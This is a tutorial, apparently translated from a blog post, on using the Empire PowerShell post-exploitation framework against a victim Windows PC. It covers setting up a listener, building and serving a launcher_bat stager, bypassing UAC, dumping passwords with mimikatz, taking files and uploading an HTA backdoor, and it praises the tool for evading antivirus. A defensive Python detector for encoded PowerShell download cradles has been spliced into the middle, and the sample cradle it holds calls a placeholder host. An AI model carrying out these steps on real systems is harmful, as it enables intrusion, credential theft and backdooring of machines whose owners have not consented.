Empire: a PowerShell post-exploitation framework

0x01 About
Empire is a post-exploitation framework. It consists of a pure-PowerShell agent, encrypted communications, and a flexible architecture with additional features. Empire can run PowerShell agents without needing PowerShell.exe. Its post-exploitation modules are quickly deployable and cover a wide range, from a keylogger to Mimikatz. The framework combines the PowerShell Empire and Python Empire projects, which makes it user-friendly and convenient. PowerShell Empire came out in 2015 and Python Empire in 2016. It is similar to Metasploit and Meterpreter, but because it is a command-and-control tool it lets you control the PC more effectively.
 
PowerShell offers a wealth of offensive advantages, including full .NET access, AppLocker whitelisting, and direct access to Win32. It can also construct malicious binaries in memory. It provides C2 functionality that lets you implant a second stage after the first. It can also be used for lateral movement. Compared with other frameworks it develops rapidly and is very convenient. In addition, because it does not require PowerShell.exe, it allows you to bypass anti-virus. For these reasons PowerShell Empire is the best choice.
 
0x02 Components
Listener: a listener is a process that listens for a connection from the machine we are attacking. This is how Empire gets the loot back to the attacker's computer.
Stager: a stager is a piece of code that lets our malicious code run through the agent on the compromised host.
Agent: an agent is a program that maintains the connection between your computer and the compromised host.
Module: modules execute our malicious commands, which can collect credentials and escalate our privileges.
 
0x03 Installation
Use the following command to download it:
After the download completes, install it with the steps below:
cd Empire/
cd setup/
./install.sh
After installation completes, move back to the Empire directory and run ./empire to start Empire.
 
Now use the help command, since it shows all the basic options needed to get started.
(Empire) > help
 
Commands
========
agents          Jump to the Agents menu.
creds           Add/display credentials to/from the database.
exit            Exit Empire
help            Displays the help menu.
interact        Interact with a particular agent.
list            Lists active agents or listeners.
listeners       Interact with active listeners.
load            Loads Empire modules from a non-standard folder.
plugin          Load a plugin file to extend Empire.
plugins         List all available and active plugins.
preobfuscate    Preobfuscate PowerShell module_source files
reload          Reload one (or all) Empire modules.
report          Produce report CSV and log files: sessions.csv, credentials.csv, master.log
reset           Reset a global option (eg IP whitelists).
resource        Read and execute a list of Empire commands from a file.
searchmodule    Search Empire module names/descriptions.
set             Set a global option (eg IP whitelists).
show            Show a global option (eg IP whitelists).
usemodule       Use an Empire module.
usestager       Use an Empire stager.
 
Following the workflow, we must first create a listener on the local machine. To view active listeners, type:
listeners
 
In the listeners interface, enter the following command to view all the available listener types:
(Empire: listeners) > uselistener <tab> <tab>
dbx http_com http_hop meterpreter redirector
http http_foreign http_mapi onedrive
 
The most popular and most commonly used is the http listener:
uselistener http
This command creates a listener on local port 80. If port 80 is already occupied by a service such as Apache, be sure to stop that service first, because the http listener can only work on port 80.
 
To review the commands available in the listeners menu, use tab completion:
(Empire: listeners) > <tab><tab>
agents delete enable info list resource
back disable exit kill listeners uselistener
creds edit help launcher main usestager
 
To delete an active listener, use the kill command:
(Empire: listeners) > kill http
[!] Killing listener 'http'
 
Now view all the options this listener type provides:
info
 
As shown in the figure, you can use the various settings to modify or customize the listener. We can try changing the name of our listener, which helps you keep track of all active listeners:
set Name test
The above command changes the listener's Name from http to test.
Normally the listener automatically uses the local host's IP, but just in case, you can set the IP with the following command:
set Host 192.168.88.152
execute
The above command starts the listener.
Now enter 'back' to return to the listeners interface so that we can run our stager. Use the following command to view all the stagers Empire provides:
(Empire: listeners/http) > back
(Empire: listeners) > usestager <tab> <tab>
As shown in the figure, there are many modules for Windows and iOS, as well as multi modules that can be used on any platform. In the following experiment we will use launcher_bat to create the malware and exploit the victim's PC.
usestager windows/launcher_bat
 
Then type "info" again to see all the settings the exploit requires. On inspection, we only need to provide the listener.
set Listener test
execute
The two commands above set the listener to test, create /tmp/launcher.bat, and execute our exploit. Use a python web server to deliver this file to the victim's PC:
python -m SimpleHTTPServer 8080
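From the defender's side, the launcher delivered in this step is the artifact worth catching. The following is an added example, not code from the original post or from the Empire project: it scans process-creation command lines (the CommandLine field of Sysmon event 1 or Windows event 4688) for the pattern batch/PowerShell launchers of this kind typically leave behind, which is assumed here to be powershell.exe started with a hidden window, no profile and a base64 -EncodedCommand that unwraps to a download-and-execute cradle. The log lines, the placeholder listener host and the scoring thresholds are all constructed for the example.

```python
import base64
import re

# General PowerShell switches that Empire-style launchers commonly pass.
# These are plain PowerShell options, not tool-specific signatures.
LAUNCH_FLAGS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+(?:hidden|1)\b", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "non_interactive": re.compile(r"-noni(?:nteractive)?\b", re.I),
    "sta": re.compile(r"-sta\b", re.I),
}

# Markers inside the decoded script body that indicate a download cradle.
CONTENT_MARKERS = {
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "download_cradle": re.compile(r"Net\.WebClient|DownloadString|DownloadData", re.I),
    "base64_unwrap": re.compile(r"FromBase64String", re.I),
}

POWERSHELL_RE = re.compile(r"\b(?:powershell(?:\.exe)?|pwsh(?:\.exe)?)\b", re.I)
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_FLAG_RE = re.compile(r'-(e[a-z]*)\s+"?([A-Za-z0-9+/=]{8,})"?', re.I)


def decode_encoded_command(cmdline: str):
    """Return the UTF-16LE script hidden behind -EncodedCommand, or None."""
    for m in ENC_FLAG_RE.finditer(cmdline):
        flag, blob = m.group(1).lower(), m.group(2)
        if not "encodedcommand".startswith(flag):
            continue  # e.g. -ExecutionPolicy also starts with -e; skip it
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return None
    return None


def analyze(cmdline: str) -> dict:
    """Score one process command line: indicators found, decoded body, verdict."""
    result = {"is_powershell": False, "indicators": [], "decoded": None, "verdict": "benign"}
    if not POWERSHELL_RE.search(cmdline):
        return result
    result["is_powershell"] = True
    hits = [name for name, rx in LAUNCH_FLAGS.items() if rx.search(cmdline)]
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        hits.append("encoded_command")
        result["decoded"] = decoded
        hits += [name for name, rx in CONTENT_MARKERS.items() if rx.search(decoded)]
    result["indicators"] = hits
    # Thresholds are a constructed heuristic for the example, not a tuned rule.
    if "encoded_command" in hits and any(n in hits for n in CONTENT_MARKERS):
        result["verdict"] = "likely_stager"
    elif len(hits) >= 2:
        result["verdict"] = "suspicious"
    return result


def triage(events):
    """Return (index, verdict) for every event that is not benign."""
    verdicts = [(i, analyze(e)["verdict"]) for i, e in enumerate(events)]
    return [(i, v) for i, v in verdicts if v != "benign"]


def _encode_ps(script: str) -> str:
    """Encode a script the way -EncodedCommand expects (base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample: a generic download cradle pointing at a placeholder host.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://LISTENER-PLACEHOLDER/')"

# Constructed process-creation command lines; none are real Empire output.
SAMPLE_EVENTS = [
    'powershell.exe -Command "Get-Process | Sort-Object CPU"',
    'powershell.exe -ExecutionPolicy Unrestricted -File C:\\scripts\\backup.ps1',
    f"powershell.exe -NoP -sta -w 1 -enc {_encode_ps(SAMPLE_SCRIPT)}",
    "notepad.exe C:\\Users\\user\\notes.txt",
]

if __name__ == "__main__":
    for i, verdict in triage(SAMPLE_EVENTS):
        print(f"event {i}: {verdict} {analyze(SAMPLE_EVENTS[i])['indicators']}")
```

The decoder deliberately accepts any prefix of -EncodedCommand, because the abbreviation the launcher uses is an attacker-controlled choice; the signed-script case with -ExecutionPolicy shows why the prefix check is needed to avoid false positives on other -e options.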
 
When the file is executed, you will get a session. To check your sessions, type:
agents
With the command above you can see the activated session. You can rename the session, because the default name is complicated and hard to remember. To do so, type:
rename P4BNYW6D pc01
Use the following command to access the session:
interact pc01
Once you have access to the session, try the following command to obtain an administrative session:
bypassuac http
After running the bypassuac command, another session opens. Type the following to rename that session:
rename HE3K45LN admin01
Now interact with admin01:
interact admin01
<tab> <tab> lets us see all the options in the shell. Several of them are useful for post-exploitation, such as info, jobs, list, etc., as shown in the figure.
info: all the basic details such as IP, nonce, jitter, integrity, etc.
Now, if you use the 'help' command, you will be able to see all the executable commands.
Let's try running mimikatz to get the user's password. Since mimikatz cannot run in an ordinary guest user shell and only runs in an admin shell, this also shows why we had to obtain administrator access before we could use mimikatz.
Hmmmm! The user's password is "123456".
creds
The above command also dumps any user's credentials or passwords, both in cleartext and as hashes.
Another important command is the shell command.
We use it to run proper Microsoft Windows commands through the victim's shell.
For example, one such cmd-only Windows command is netstat:
shell netstat -ano
As expected, the above command shows us all the ports currently in use on the machine!
Now, since the default shell directory in Windows is "C:/windows/system32", let's try moving to another directory and downloading some files from there; we can also upload something to that location, for example a backdoor! Now use the following commands:
shell cd C:\Users\lihui03\Desktop
shell dir
download msf.pdf
 
The above command downloads a file named msf.pdf from the Windows desktop to Empire's downloads directory.
Here we can upload any backdoor. With the help of the command below we upload a backdoor from Kali's desktop to the victim's desktop, and we can even invoke this file since we have shell access!
upload /root/shell.hta
This is where the downloaded file is located:
View the uploaded file:
The above command proves that we have indeed uploaded shell.hta.
What was shown so far is a basic demonstration of Empire, the different terms it uses and how to use them. There is one more term, usemodule. Finally, let's see how to use it.
This command displays all the available modules, as shown in the figure below:
Here is a small demonstration of how to use usemodule. Type:
usemodule trollsploit/message
set MsgText you have been hacked
execute
y
Using the above module displays a message on the victim's PC, as shown in the figure below:
This is what it looks like on the target machine!!!
Conclusion
Malware in the form of .exe/.dll/.hta etc. lets an attacker build any desired attack, because this framework has access to Win32. With its wide, realistic and effective collection of post-exploitation modules it is a great tool. Ultimately the goal is to remain undetected and succeed in the attack, and this tool allows us to do that.
 
Origin www.cnblogs.com/micr067/p/11515417.html